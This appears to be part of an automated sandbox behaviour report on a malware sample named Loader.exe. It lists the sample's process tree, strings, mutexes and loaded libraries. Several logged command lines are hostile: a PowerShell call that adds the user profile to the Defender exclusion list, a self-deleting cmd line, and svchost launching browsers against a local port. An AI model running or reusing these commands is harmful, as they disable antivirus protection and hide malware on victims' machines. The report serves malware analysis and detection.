                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeCode function: 2_2_00404740 FindResourceExA,LoadResource,LockResource,fprintf,FindResourceExA,LoadResource,LockResource,fprintf,strchr,strlen,strcpy,FindResourceExA,LoadResource,LockResource,fprintf,strchr,strlen,strcpy,strncpy,strlen,strcat,strncpy,strlen,strcat,FindResourceExA,LoadResource,LockResource,atoi,SetLastError,SetLastError,SetLastError,strcpy,fprintf,FindResourceExA,LoadResource,LockResource,atoi,strcpy,fprintf,fprintf,SetLastError,SetLastError,fprintf,2_2_00404740
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\CampaignHardwareLauncherJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
                    Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-c50d30d3-8556-339baa-d1c50f81ff32}
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\nsbB4EF.tmpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                    Source: unknownProcess created: C:\Windows\explorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Loader.exeVirustotal: Detection: 27%
                    Source: Loader.exeReversingLabs: Detection: 23%
                    Source: javaw.exeString found in binary or memory: \php/runtime/loader/dump/ClassDumper
                    Source: javaw.exeString found in binary or memory: Wphp/runtime/loader/dump/FunctionDumper
                    Source: javaw.exeString found in binary or memory: T7 php/runtime/loader/dump/io/DumpException7^~p
                    Source: javaw.exeString found in binary or memory: Gjavafx/fxml/LoadException
                    Source: javaw.exeString found in binary or memory: #Lcom/sun/javafx/fxml/LoadListener;form/B
                    Source: javaw.exeString found in binary or memory: i()Lcom/sun/javafx/fxml/LoadListener;s
                    Source: javaw.exeString found in binary or memory: c(W(Lcom/sun/javafx/fxml/LoadListener;)V/su~2$tvU
                    Source: javaw.exeString found in binary or memory: (Ljava/lang/String;Ljava/lang/Throwable;)Ljavafx/fxml/LoadException;
                    Source: javaw.exeString found in binary or memory: (Ljavafx/fxml/FXMLLoader;Ljava/lang/String;)Ljavafx/fxml/LoadException;
                    Source: javaw.exeString found in binary or memory: }T(Ljava/lang/Throwable;)Ljavafx/fxml/LoadException;
                    Source: javaw.exeString found in binary or memory: /addslashes
                    Source: javaw.exeString found in binary or memory: tDLjava/util/Map$Entry<Ljava/lang/Integer;Lphp/runtime/loader/sourcemap/SourceMap$Item;>;
                    Source: javaw.exeString found in binary or memory: yLphp/runtime/loader/sourcemap/SourceMap$Item;
                    Source: javaw.exeString found in binary or memory: 0php/runtime/loader/sourcemap/SourceMap$Item
                    Source: javaw.exeString found in binary or memory: >&()Ljava/util/Map<Ljava/lang/Integer;Lphp/runtime/loader/sourcemap/SourceMap$Item;>;
                    Source: javaw.exeString found in binary or memory: ~+]Ljava/util/Map<Ljava/lang/Integer;Lphp/runtime/loader/sourcemap/SourceMap$Item;>;
                    Source: javaw.exeString found in binary or memory: |(DDDDZLjavafx/scene/paint/CycleMethod;[Ljavafx/scene/paint/Stop;)V
                    Source: javaw.exeString found in binary or memory: |(DDDDZLjavafx/scene/paint/CycleMethod;[Ljavafx/scene/paint/Stop;)V
                    Source: javaw.exeString found in binary or memory: bLjava/util/List<Ljavafx/scene/paint/Stop;>;s
                    Source: javaw.exeString found in binary or memory: bLjava/util/List<Ljavafx/scene/paint/Stop;>;s
                    Source: javaw.exeString found in binary or memory: :Q([Ljavafx/scene/paint/Stop;)Ljava/util/List;+
                    Source: javaw.exeString found in binary or memory: :Q([Ljavafx/scene/paint/Stop;)Ljava/util/List;+
                    Source: javaw.exeString found in binary or memory: (Lcom/sun/javafx/css/parser/StopConverter$1;)V
                    Source: javaw.exeString found in binary or memory: (Lcom/sun/javafx/css/parser/StopConverter$1;)V
                    Source: javaw.exeString found in binary or memory: Lphp/runtime/loader/dump/Dumper<Lphp/runtime/reflection/helper/GeneratorEntity;>;
                    Source: javaw.exeString found in binary or memory: 5=:Lphp/runtime/loader/dump/Dumper<Lphp/runtime/reflection/ClassEntity;>;
                    Source: javaw.exeString found in binary or memory: Lphp/runtime/loader/dump/io/DumpException;
                    Source: javaw.exeString found in binary or memory: LYLphp/runtime/loader/dump/Dumper<Lphp/runtime/reflection/MethodEntity;>;
                    Source: javaw.exeString found in binary or memory: php/runtime/loader/dump/io/DumpInputStream$1
                    Source: javaw.exeString found in binary or memory: YJLphp/runtime/loader/dump/io/DumpInputStream;
                    Source: javaw.exeString found in binary or memory: Lphp/runtime/loader/dump/io/DumpOutputStream;
                    Source: javaw.exeString found in binary or memory: {php/runtime/loader/dump/io/DumpOutputStream
                    Source: javaw.exeString found in binary or memory: php/runtime/loader/dump/io/DumpInputStream
                    Source: javaw.exeString found in binary or memory: "{Lphp/runtime/loader/dump/GeneratorDumper;
                    Source: javaw.exeString found in binary or memory: Lphp/runtime/loader/dump/Dumper<Lphp/runtime/reflection/PropertyEntity;>;ss
                    Source: javaw.exeString found in binary or memory: d7nUjavafx/scene/paint/Stop
                    Source: javaw.exeString found in binary or memory: d7nUjavafx/scene/paint/Stop
                    Source: javaw.exeString found in binary or memory: c(DDDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
                    Source: javaw.exeString found in binary or memory: c(DDDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
                    Source: javaw.exeString found in binary or memory: [php/runtime/loader/dump/Dumper
                    Source: javaw.exeString found in binary or memory: /addconstants
                    Source: javaw.exeString found in binary or memory: *(DDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
                    Source: javaw.exeString found in binary or memory: *(DDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
                    Source: javaw.exeString found in binary or memory: g(Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/util/List<Lcom/sun/prism/paint/Stop;>;
                    Source: javaw.exeString found in binary or memory: g(Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/util/List<Lcom/sun/prism/paint/Stop;>;
                    Source: javaw.exeString found in binary or memory: 5::-addProperties
                    Source: javaw.exeString found in binary or memory: nX(Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/lang/Object;
                    Source: javaw.exeString found in binary or memory: nX(Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/lang/Object;
                    Source: javaw.exeString found in binary or memory: q&&o(Lphp/runtime/loader/RuntimeClassLoader;)V
                    Source: javaw.exeString found in binary or memory: /adding a window to a container
                    Source: javaw.exeString found in binary or memory: gLphp/runtime/loader/dump/ModuleDumper;
                    Source: javaw.exeString found in binary or memory: xqphp/runtime/loader/dump/ModuleDumper
                    Source: javaw.exeString found in binary or memory: Ljava/util/Map<Ljava/lang/String;Lphp/runtime/loader/sourcemap/SourceMap;>;
                    Source: javaw.exeString found in binary or memory: Lphp/runtime/launcher/Launcher$1;ss
                    Source: javaw.exeString found in binary or memory: DLphp/runtime/loader/RuntimeClassLoader;
                    Source: javaw.exeString found in binary or memory: .in-addr.arpa
                    Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
                    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe "C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe"
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 348
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr34F8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c462449b"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2760,i,8911409876451875060,10497288921933201454,262144 /prefetch:8
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr417C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c7af6c55"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3232 --field-trial-handle=2952,i,15376106981167102888,3693365573348808806,262144 /prefetch:3
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncherJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.batJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILEJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe "C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr34F8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c462449b"
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr417C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c7af6c55"
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2760,i,8911409876451875060,10497288921933201454,262144 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3232 --field-trial-handle=2952,i,15376106981167102888,3693365573348808806,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: winmmbase.dllJump to behavior
